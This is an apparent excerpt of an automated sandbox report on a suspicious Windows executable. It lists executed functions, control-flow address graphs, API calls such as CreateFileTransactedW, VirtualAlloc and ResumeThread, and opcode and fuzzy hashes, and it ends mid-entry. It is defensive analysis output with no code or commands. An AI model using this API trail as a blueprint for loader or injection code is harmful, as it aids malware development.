                                                                                                                                          execution_graph 15966 7ffd9bacd04a 15967 7ffd9bacd059 CreateFileTransactedW 15966->15967 15969 7ffd9bacd268 15967->15969 15946 7ffd9bacf0f5 15947 7ffd9bacf11f VirtualAlloc 15946->15947 15949 7ffd9bacf23f 15947->15949 15950 7ffd9bacd2f5 15951 7ffd9bacd36b WriteFile 15950->15951 15953 7ffd9bacd48f 15951->15953 15954 7ffd9bace6e1 15956 7ffd9bace6eb 15954->15956 15955 7ffd9bace815 15961 7ffd9bacec5a 15955->15961 15956->15955 15958 7ffd9bace822 15956->15958 15960 7ffd9bace820 15956->15960 15959 7ffd9bacec5a GetSystemInfo 15958->15959 15959->15960 15963 7ffd9bacec65 15961->15963 15962 7ffd9bacec87 15962->15960 15963->15962 15964 7ffd9baced22 GetSystemInfo 15963->15964 15965 7ffd9baced85 15964->15965 15965->15960 15970 7ffd9bacec91 15971 7ffd9bacec9e GetSystemInfo 15970->15971 15973 7ffd9baced85 15971->15973 15974 7ffd9bacb57d 15975 7ffd9bb314b0 15974->15975 15978 7ffd9bb307d0 15975->15978 15977 7ffd9bb31599 15979 7ffd9bb307db 15978->15979 15981 7ffd9bb3087e 15979->15981 15982 7ffd9bb30897 15979->15982 15981->15977 15983 7ffd9bb308a2 15982->15983 15984 7ffd9bb308ea ResumeThread 15982->15984 15983->15981 15986 7ffd9bb309b4 15984->15986 15986->15981

                                                                                                                                          Executed Functions

                                                                                                                                          Function 00007FFD9BCB3AF0 Relevance: 3.0, Strings: 2, Instructions: 522COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 558 7ffd9bcb3af0-7ffd9bcb3b0a 559 7ffd9bcb410c-7ffd9bcb4119 558->559 560 7ffd9bcb3b10-7ffd9bcb3b20 558->560 562 7ffd9bcb416a-7ffd9bcb4180 559->562 561 7ffd9bcb3b26-7ffd9bcb3b61 560->561 560->562 567 7ffd9bcb3bfa-7ffd9bcb3c02 561->567 565 7ffd9bcb41ca-7ffd9bcb41dd 562->565 566 7ffd9bcb4182-7ffd9bcb41b7 562->566 568 7ffd9bcb41b9-7ffd9bcb41c9 566->568 569 7ffd9bcb4201-7ffd9bcb4225 566->569 570 7ffd9bcb3c08 567->570 571 7ffd9bcb3b66-7ffd9bcb3b6f 567->571 568->565 572 7ffd9bcb4227-7ffd9bcb425c 569->572 573 7ffd9bcb426f-7ffd9bcb4282 569->573 574 7ffd9bcb3c12-7ffd9bcb3c2f 570->574 571->562 575 7ffd9bcb3b75-7ffd9bcb3b80 571->575 576 7ffd9bcb42a6-7ffd9bcb42ab 572->576 577 7ffd9bcb425e-7ffd9bcb426e 572->577 582 7ffd9bcb3c36-7ffd9bcb3c47 574->582 578 7ffd9bcb3b86-7ffd9bcb3b9a 575->578 579 7ffd9bcb3c0a-7ffd9bcb3c0e 575->579 583 7ffd9bcb42ad 576->583 584 7ffd9bcb42b4-7ffd9bcb42bd 576->584 577->573 580 7ffd9bcb3b9c-7ffd9bcb3bb3 578->580 581 7ffd9bcb3bf3-7ffd9bcb3bf7 578->581 579->574 580->562 585 7ffd9bcb3bb9-7ffd9bcb3bc5 580->585 581->567 596 7ffd9bcb3c49-7ffd9bcb3c5e 582->596 597 7ffd9bcb3c60-7ffd9bcb3c6f 582->597 583->584 586 7ffd9bcb42c9-7ffd9bcb42d5 584->586 587 7ffd9bcb42bf-7ffd9bcb42c5 584->587 590 7ffd9bcb3bc7-7ffd9bcb3bdb 585->590 591 7ffd9bcb3bdf-7ffd9bcb3bf0 585->591 588 7ffd9bcb42d7-7ffd9bcb42dd 586->588 589 7ffd9bcb42e1-7ffd9bcb42ed 586->589 587->586 588->589 593 7ffd9bcb42f9-7ffd9bcb4305 589->593 594 7ffd9bcb42ef-7ffd9bcb42f5 589->594 590->580 595 7ffd9bcb3bdd 590->595 591->581 598 7ffd9bcb4307-7ffd9bcb430d 593->598 599 7ffd9bcb4311-7ffd9bcb4341 call 7ffd9bcb3a50 593->599 594->593 595->581 596->597 604 7ffd9bcb3c91-7ffd9bcb3cfe 597->604 605 7ffd9bcb3c71-7ffd9bcb3c8c 597->605 598->599 617 7ffd9bcb3d4f-7ffd9bcb3d60 604->617 618 7ffd9bcb3d00-7ffd9bcb3d13 604->618 615 7ffd9bcb40c9-7ffd9bcb4106 605->615 615->559 615->560 617->615 618->562 620 7ffd9bcb3d19-7ffd9bcb3d4d 618->620 620->617 620->618
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.4199499040.00007FFD9BCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BCB0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bcb0000_psSFLznncXozWndMhTDdwutNn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: -_L$8_L
                                                                                                                                          • API String ID: 0-3034320344
                                                                                                                                          • Opcode ID: 13bcf3e6e8a930f3603eea13ab249632f2946521ca62f340cba61fcf9e4d9094
                                                                                                                                          • Instruction ID: 8b0e076db4b3205b05644e5175c66b28c6c0e2647d86d16916016001384c5486
                                                                                                                                          • Opcode Fuzzy Hash: 13bcf3e6e8a930f3603eea13ab249632f2946521ca62f340cba61fcf9e4d9094
                                                                                                                                          • Instruction Fuzzy Hash: 99F10330A0D65C8FDB59DB68C8599BD77E1FF86314B1141AED04ECB2A2DA35EC12CB41
                                                                                                                                          Function 00007FFD9BACD04A Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 917 7ffd9bacd04a-7ffd9bacd057 918 7ffd9bacd059-7ffd9bacd061 917->918 919 7ffd9bacd062-7ffd9bacd128 917->919 918->919 923 7ffd9bacd12a-7ffd9bacd141 919->923 924 7ffd9bacd144-7ffd9bacd266 CreateFileTransactedW 919->924 923->924 925 7ffd9bacd268 924->925 926 7ffd9bacd26e-7ffd9bacd2f0 924->926 925->926
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.4198219367.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bac0000_psSFLznncXozWndMhTDdwutNn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateFileTransacted
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2149338676-0
                                                                                                                                          • Opcode ID: 1ef24e60b7020ca750af2e9747ca570503c36855c4aa7c0f2d0b1c1a27c5fb26
                                                                                                                                          • Instruction ID: 356916beadd69d38a6a4a02227663d4e8e918a52346096f730350096989397c6
                                                                                                                                          • Opcode Fuzzy Hash: 1ef24e60b7020ca750af2e9747ca570503c36855c4aa7c0f2d0b1c1a27c5fb26
                                                                                                                                          • Instruction Fuzzy Hash: AC912470908A5C8FDB99DF58C894BE9BBF1FB6A310F1001AED04DE3291DB75A980CB44
                                                                                                                                          Function 00007FFD9BCB7DC9 Relevance: 1.8, Strings: 1, Instructions: 540COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 929 7ffd9bcb7dc9-7ffd9bcb7dda 930 7ffd9bcb7d77-7ffd9bcb7daa 929->930 931 7ffd9bcb7ddc-7ffd9bcb7e04 929->931 938 7ffd9bcb7d47-7ffd9bcb7d50 930->938 939 7ffd9bcb7dac-7ffd9bcb7db8 930->939 933 7ffd9bcb7e0a-7ffd9bcb7e0f 931->933 934 7ffd9bcb8121-7ffd9bcb812b 931->934 936 7ffd9bcb7e1b-7ffd9bcb7e34 933->936 937 7ffd9bcb7e11-7ffd9bcb7e14 933->937 944 7ffd9bcb812c-7ffd9bcb815a 934->944 941 7ffd9bcb7e48-7ffd9bcb7e75 936->941 942 7ffd9bcb7e36-7ffd9bcb7e46 936->942 937->936 947 7ffd9bcb7dbf-7ffd9bcb7dc4 939->947 941->944 949 7ffd9bcb7e7b-7ffd9bcb7e86 941->949 942->941 950 7ffd9bcb80f7-7ffd9bcb8105 944->950 951 7ffd9bcb815c-7ffd9bcb819e 944->951 952 7ffd9bcb7e8c-7ffd9bcb7e9a 949->952 953 7ffd9bcb7f44-7ffd9bcb7f49 949->953 963 7ffd9bcb810f-7ffd9bcb8120 950->963 976 7ffd9bcb81bb-7ffd9bcb81cc 951->976 977 7ffd9bcb81a0-7ffd9bcb81a6 951->977 952->944 957 7ffd9bcb7ea0-7ffd9bcb7eb1 952->957 955 7ffd9bcb7f4f-7ffd9bcb7f59 953->955 956 7ffd9bcb7fdd-7ffd9bcb7fe7 953->956 955->944 958 7ffd9bcb7f5f-7ffd9bcb7f73 955->958 959 7ffd9bcb8009-7ffd9bcb8010 956->959 960 7ffd9bcb7fe9-7ffd9bcb8007 956->960 961 7ffd9bcb7f19-7ffd9bcb7f30 957->961 962 7ffd9bcb7eb3-7ffd9bcb7ed6 957->962 964 7ffd9bcb8013-7ffd9bcb801d 958->964 959->964 960->959 961->944 965 7ffd9bcb7f36-7ffd9bcb7f3e 961->965 967 7ffd9bcb7f78-7ffd9bcb7f7d 962->967 968 7ffd9bcb7edc-7ffd9bcb7eef 962->968 964->944 970 7ffd9bcb8023-7ffd9bcb803b 964->970 965->952 965->953 972 7ffd9bcb7ef3-7ffd9bcb7f17 967->972 968->972 970->944 975 7ffd9bcb8041-7ffd9bcb8059 970->975 972->961 985 7ffd9bcb7f82-7ffd9bcb7f85 972->985 975->944 978 7ffd9bcb805f-7ffd9bcb8093 975->978 982 7ffd9bcb81ce-7ffd9bcb81dc 976->982 983 7ffd9bcb81dd-7ffd9bcb8200 976->983 980 7ffd9bcb81a8-7ffd9bcb81b9 977->980 981 7ffd9bcb8201-7ffd9bcb822e 977->981 978->944 1006 7ffd9bcb8099-7ffd9bcb80ac 978->1006 980->976 980->977 982->983 990 7ffd9bcb7f87-7ffd9bcb7f97 985->990 991 7ffd9bcb7f9b-7ffd9bcb7fa8 985->991 990->991 991->944 992 7ffd9bcb7fae-7ffd9bcb7fdc 991->992 1006->963 1007 7ffd9bcb80ae-7ffd9bcb80b9 1006->1007 1007->963 1009 7ffd9bcb80bb-7ffd9bcb80d2 1007->1009 1011 7ffd9bcb80d4-7ffd9bcb80dd 1009->1011 1012 7ffd9bcb80e3-7ffd9bcb80f3 1009->1012 1014 7ffd9bcb80df 1011->1014 1012->950 1014->1014 1016 7ffd9bcb80e1 1014->1016 1016->1012
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.4199499040.00007FFD9BCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BCB0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bcb0000_psSFLznncXozWndMhTDdwutNn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: d
                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                          • Opcode ID: afcbbe6f2d7d14f4481cd312189028e5ea2185fb40a803392f8b6ff462e8da9d
                                                                                                                                          • Instruction ID: 6fc9cacd5120b884e8a20f71e2e4071ec7a1ca18cafe84ab766d12f10803213b
                                                                                                                                          • Opcode Fuzzy Hash: afcbbe6f2d7d14f4481cd312189028e5ea2185fb40a803392f8b6ff462e8da9d
                                                                                                                                          • Instruction Fuzzy Hash: 13F15530A0EA494FD759DF28C8A197977E0FF95314B1442BAD449CB1ABDA38EC43CB81
                                                                                                                                          Function 00007FFD9BCB1362 Relevance: 1.8, Strings: 1, Instructions: 533COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1017 7ffd9bcb1362-7ffd9bcb1370 1019 7ffd9bcb1348 1017->1019 1020 7ffd9bcb1373-7ffd9bcb13d9 1017->1020 1021 7ffd9bcc11f0-7ffd9bcc11fe 1019->1021 1058 7ffd9bcb140b-7ffd9bcb14d9 1020->1058 1059 7ffd9bcb13db-7ffd9bcb13f9 1020->1059 1023 7ffd9bcc1200 1021->1023 1025 7ffd9bcc120b-7ffd9bcc12a1 1023->1025 1030 7ffd9bcc1226-7ffd9bcc12a6 1025->1030 1031 7ffd9bcc12ac-7ffd9bcc12ca 1025->1031 1030->1031 1039 7ffd9bcc1248-7ffd9bcc12a8 1030->1039 1036 7ffd9bcc1267-7ffd9bcc126a 1031->1036 1037 7ffd9bcc12cc-7ffd9bcc1333 1031->1037 1036->1031 1040 7ffd9bcc126c-7ffd9bcc12aa 1036->1040 1053 7ffd9bcc1365-7ffd9bcc139b 1037->1053 1054 7ffd9bcc1335-7ffd9bcc176f 1037->1054 1039->1036 1040->1031 1049 7ffd9bcc128d-7ffd9bcc12a0 1040->1049 1061 7ffd9bcc177a-7ffd9bcc1792 1053->1061 1054->1061 1085 7ffd9bcb14db-7ffd9bcb14f9 1058->1085 1086 7ffd9bcb150a-7ffd9bcb15a8 1058->1086 1100 7ffd9bcb15a9-7ffd9bcb15f8 1086->1100 1108 7ffd9bcb15fa-7ffd9bcb16c2 1100->1108 1125 7ffd9bcb16c5-7ffd9bcb16cd 1108->1125 1126 7ffd9bcb16cf-7ffd9bcb1708 1125->1126 1127 7ffd9bcb16ce 1125->1127 1126->1125 1131 7ffd9bcb170a-7ffd9bcb176f 1126->1131 1127->1126 1131->1021
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.4199499040.00007FFD9BCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BCB0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bcb0000_psSFLznncXozWndMhTDdwutNn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: .._^
                                                                                                                                          • API String ID: 0-3800715667
                                                                                                                                          • Opcode ID: b8c007a031609b225904a142b35017dfff5914edeb2e1bf78a199885245f59af
                                                                                                                                          • Instruction ID: 585ec370b8287b4411468cfaab561297de3af2297fb62d61eb37fb69327f90d0
                                                                                                                                          • Opcode Fuzzy Hash: b8c007a031609b225904a142b35017dfff5914edeb2e1bf78a199885245f59af
                                                                                                                                          • Instruction Fuzzy Hash: B5F1EB57A0F2A60BE725A67CACB54ED3F90DF6223D70902F7E0D98E0E7EC086546C650
                                                                                                                                          Function 00007FFD9BACD2F5 Relevance: 1.7, APIs: 1, Instructions: 216fileCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1138 7ffd9bacd2f5-7ffd9bacd3c2 1141 7ffd9bacd3ea-7ffd9bacd48d WriteFile 1138->1141 1142 7ffd9bacd3c4-7ffd9bacd3e7 1138->1142 1143 7ffd9bacd495-7ffd9bacd4f1 1141->1143 1144 7ffd9bacd48f 1141->1144 1142->1141 1144->1143
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.4198219367.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bac0000_psSFLznncXozWndMhTDdwutNn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileWrite
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                          • Opcode ID: 2ff6e92cf50c909fdff3e0c37ee6bd0b3e14f7cddcf5948cbbc31ddbe01deb41
                                                                                                                                          • Instruction ID: f644aa490828e6774bf09de142a2abe5105d199ed2ce1277d13e132b145f7f68
                                                                                                                                          • Opcode Fuzzy Hash: 2ff6e92cf50c909fdff3e0c37ee6bd0b3e14f7cddcf5948cbbc31ddbe01deb41
                                                                                                                                          • Instruction Fuzzy Hash: 6D611370A08A5C8FDB98DF58C895BE9BBF1FB69310F1041AED04DE3251DB74A985CB40
                                                                                                                                          Function 00007FFD9BACEC5A Relevance: 1.7, APIs: 1, Instructions: 167COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1146 7ffd9bacec5a-7ffd9bacec63 1147 7ffd9bacec65-7ffd9bacec83 1146->1147 1148 7ffd9bacecad 1146->1148 1152 7ffd9bacec85 1147->1152 1153 7ffd9bacec9e-7ffd9bacecaa 1147->1153 1150 7ffd9bacecaf 1148->1150 1151 7ffd9bacecb0-7ffd9bacece2 1148->1151 1150->1151 1156 7ffd9bacece4-7ffd9baced1a 1151->1156 1155 7ffd9bacec87-7ffd9bacec8f 1152->1155 1152->1156 1153->1148 1158 7ffd9baced22-7ffd9baced83 GetSystemInfo 1156->1158 1159 7ffd9baced8b-7ffd9bacedbb 1158->1159 1160 7ffd9baced85 1158->1160 1160->1159
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.4198219367.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bac0000_psSFLznncXozWndMhTDdwutNn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InfoSystem
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                          • Opcode ID: 3c68fe7a6d74c0e65b4c352e0bf5561a6326915ef129e4c9a0b19f9f80d4787b
                                                                                                                                          • Instruction ID: 8551ed6348287acac565bcfc95e5283ce7069de0774ba0f6187147c73eedbb67
                                                                                                                                          • Opcode Fuzzy Hash: 3c68fe7a6d74c0e65b4c352e0bf5561a6326915ef129e4c9a0b19f9f80d4787b
                                                                                                                                          • Instruction Fuzzy Hash: 6351BF31A0DA4C8FEB69EF98D859AF9BBF0FB55310F00416AD04DD72A2DA746945CB40
                                                                                                                                          Function 00007FFD9BB30897 Relevance: 1.7, APIs: 1, Instructions: 151threadCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1163 7ffd9bb30897-7ffd9bb308a0 1164 7ffd9bb308a2-7ffd9bb308c2 1163->1164 1165 7ffd9bb308ea-7ffd9bb309b2 ResumeThread 1163->1165 1169 7ffd9bb309b4 1165->1169 1170 7ffd9bb309ba-7ffd9bb30a04 1165->1170 1169->1170
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.4198219367.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bac0000_psSFLznncXozWndMhTDdwutNn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ResumeThread
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                          • Opcode ID: 3d232fbfc4c1dd34b1b2cf098d026388fffaac6aeab134fd1d788e14a1681716
                                                                                                                                          • Instruction ID: ae77a19eb3649024bc3a838e6647569f9b32810ad7c64afeff375028f15a364d
                                                                                                                                          • Opcode Fuzzy Hash: 3d232fbfc4c1dd34b1b2cf098d026388fffaac6aeab134fd1d788e14a1681716
                                                                                                                                          • Instruction Fuzzy Hash: 8F413870E0861C8FDB98EFA8D895AEDBBF0FB59310F10416AD40DE7252DA35A846CB40
                                                                                                                                          Function 00007FFD9BACEC91 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1173 7ffd9bacec91-7ffd9bacecad 1176 7ffd9bacecaf 1173->1176 1177 7ffd9bacecb0-7ffd9baced83 GetSystemInfo 1173->1177 1176->1177 1182 7ffd9baced8b-7ffd9bacedbb 1177->1182 1183 7ffd9baced85 1177->1183 1183->1182
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.4198219367.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bac0000_psSFLznncXozWndMhTDdwutNn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InfoSystem
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                          • Opcode ID: 06aae14b9ac8a189a1f3051ce32fbf9ba7cecaa6424547b1b368ca455b4573b7
                                                                                                                                          • Instruction ID: 49cf1a196b446afed00b94f9d54f6b2be3fcd6022f5913c0c95d6ff89ab394e9
                                                                                                                                          • Opcode Fuzzy Hash: 06aae14b9ac8a189a1f3051ce32fbf9ba7cecaa6424547b1b368ca455b4573b7
                                                                                                                                          • Instruction Fuzzy Hash: 5A418D7090C68C8FDB99DFA8D859BE9BBF0EF5A310F0441AAD04DD72A2CA746845CB41
                                                                                                                                          Function 00007FFD9BACF0F5 Relevance: 1.4, APIs: 1, Instructions: 195memoryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1218 7ffd9bacf0f5-7ffd9bacf23d VirtualAlloc 1222 7ffd9bacf245-7ffd9bacf2a9 1218->1222 1223 7ffd9bacf23f 1218->1223 1223->1222
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.4198219367.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bac0000_psSFLznncXozWndMhTDdwutNn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                          • Opcode ID: 28ae2f24c2523d4da2c0a173594d2a5c3f3ee6947e09be94a14f2ad742b67852
                                                                                                                                          • Instruction ID: 41972ba6695c08e131fe62662b56a3f782ee6eb506813a5df71dd0561cde100c
                                                                                                                                          • Opcode Fuzzy Hash: 28ae2f24c2523d4da2c0a173594d2a5c3f3ee6947e09be94a14f2ad742b67852
                                                                                                                                          • Instruction Fuzzy Hash: 73514A70908A4C8FDF98EF58C855BE9BBF0FB69314F1042AAD04DE3251DB71A981CB41
                                                                                                                                          Function 00007FFD9BCBBC18 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1226 7ffd9bcbbc18-7ffd9bcbbc33 call 7ffd9bcb0c28 1229 7ffd9bcbbc38-7ffd9bcbbc63 1226->1229 1233 7ffd9bcbbc8c-7ffd9bcbbc92 1229->1233 1234 7ffd9bcbbc99-7ffd9bcbbc9f 1233->1234 1235 7ffd9bcbbc65-7ffd9bcbbc7e 1234->1235 1236 7ffd9bcbbca1-7ffd9bcbbca6 1234->1236 1239 7ffd9bcbbd75-7ffd9bcbbd85 1235->1239 1240 7ffd9bcbbc84-7ffd9bcbbc89 1235->1240 1237 7ffd9bcbbcac-7ffd9bcbbce7 call 7ffd9bcb0c28 1236->1237 1238 7ffd9bcbbb93-7ffd9bcbbbd8 1236->1238 1254 7ffd9bcbbd68-7ffd9bcbbd6d 1237->1254 1238->1234 1244 7ffd9bcbbbde-7ffd9bcbbbe4 1238->1244 1249 7ffd9bcbbd88-7ffd9bcbbdd6 1239->1249 1250 7ffd9bcbbd87 1239->1250 1240->1233 1247 7ffd9bcbbbe6 1244->1247 1248 7ffd9bcbbb95 1244->1248 1251 7ffd9bcbbc0f-7ffd9bcbbc16 1247->1251 1248->1254 1263 7ffd9bcbbdd7 1249->1263 1250->1249 1251->1226 1256 7ffd9bcbbbe8-7ffd9bcbbc01 1251->1256 1254->1239 1256->1239 1257 7ffd9bcbbc07-7ffd9bcbbc0c 1256->1257 1257->1251 1263->1263
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.4199499040.00007FFD9BCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BCB0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bcb0000_psSFLznncXozWndMhTDdwutNn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                          • Opcode ID: b324dd294561169b3edca234422d114f60d3caea32586f1cc67bc800960b7916
                                                                                                                                          • Instruction ID: 197f9ee35059d80d63126c1d33ded0cdae358b4f9a1c8b8ba900c8127cb0bb71
                                                                                                                                          • Opcode Fuzzy Hash: b324dd294561169b3edca234422d114f60d3caea32586f1cc67bc800960b7916
                                                                                                                                          • Instruction Fuzzy Hash: F9515C71E0A55E8FDB69DBE8C4615BCB7B1EF48300F1141BAD05AE72A6CA386A05CF40
                                                                                                                                          Function 00007FFD9BCB0997 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1264 7ffd9bcb0997-7ffd9bcb09d9 1270 7ffd9bcb0a15-7ffd9bcdd8ca 1264->1270 1271 7ffd9bcb09db-7ffd9bcb09f1 1264->1271 1288 7ffd9bcdd810-7ffd9bcdd817 1270->1288 1289 7ffd9bcdd81e-7ffd9bcdd82c 1288->1289 1293 7ffd9bcdd885-7ffd9bcdd889 1289->1293 1294 7ffd9bcdd82e 1293->1294 1295 7ffd9bcdd88b 1294->1295 1296 7ffd9bcdd891 1295->1296 1298 7ffd9bcdd893-7ffd9bcdd89d 1296->1298 1299 7ffd9bcdd843-7ffd9bcdd881 call 7ffd9bcb0a28 1296->1299 1303 7ffd9bcdd883 1299->1303 1303->1298
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.4199499040.00007FFD9BCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BCB0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bcb0000_psSFLznncXozWndMhTDdwutNn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: H
                                                                                                                                          • API String ID: 0-2852464175
                                                                                                                                          • Opcode ID: cb13597304e29a91365a2c469c81a555b13d519ab6262661460edf4b61ee2a51
                                                                                                                                          • Instruction ID: 28b029de62fc7440b107384db4869314fbd7c49420a90382b77d7ad9c83aea7a
                                                                                                                                          • Opcode Fuzzy Hash: cb13597304e29a91365a2c469c81a555b13d519ab6262661460edf4b61ee2a51
                                                                                                                                          • Instruction Fuzzy Hash: 6951B335F0954E8BEB75DBADC8616FD77A0EF84314F1142B6D01ED31A6CA28AA018B81
                                                                                                                                          Function 00007FFD9BCB5B68 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.4199499040.00007FFD9BCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BCB0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bcb0000_psSFLznncXozWndMhTDdwutNn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                          • Opcode ID: 2c30b51d2070c9882050de11329690f443168add4ddd16e303a2ec4ab53e70e9
                                                                                                                                          • Instruction ID: a526a8d7794fc3026e85c8dca9d09d6f76443fe43761240ea2ff607f393e29e6
                                                                                                                                          • Opcode Fuzzy Hash: 2c30b51d2070c9882050de11329690f443168add4ddd16e303a2ec4ab53e70e9
                                                                                                                                          • Instruction Fuzzy Hash: 37515C71E0955E8FDB59DBA8C4755BDB7B1EF48300F1141BAD01AEB296DA382A01CF50
                                                                                                                                          Function 00007FFD9BCB896D Relevance: .6, Instructions: 556COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.4199499040.00007FFD9BCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BCB0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
